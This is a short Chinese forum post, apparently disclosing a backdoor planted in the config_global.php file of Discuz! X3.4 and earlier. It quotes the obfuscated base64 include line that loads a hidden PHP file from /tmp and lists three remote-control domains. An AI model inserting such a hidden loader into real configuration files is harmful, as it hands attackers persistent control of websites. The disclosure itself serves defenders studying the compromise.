Discuz! X3.4版本以下/config/config_global.php注入漏洞:
@include(base64_decode('L3RtcC8uVGVzdC11bml4L2NsaWVudC5waHA='));
解析:
写入服务器/tmp/.Test-unix/client.php
远程控制注入地址:
www.womendemengxiang.com
gbk.baidu901.com
9a9vj.com:8888
内容:
本部分内容设定了隐藏,需要回复后才能看到
www.womendemengxiang.com
gbk.baidu901.com
9a9vj.com:8888


太厉害呀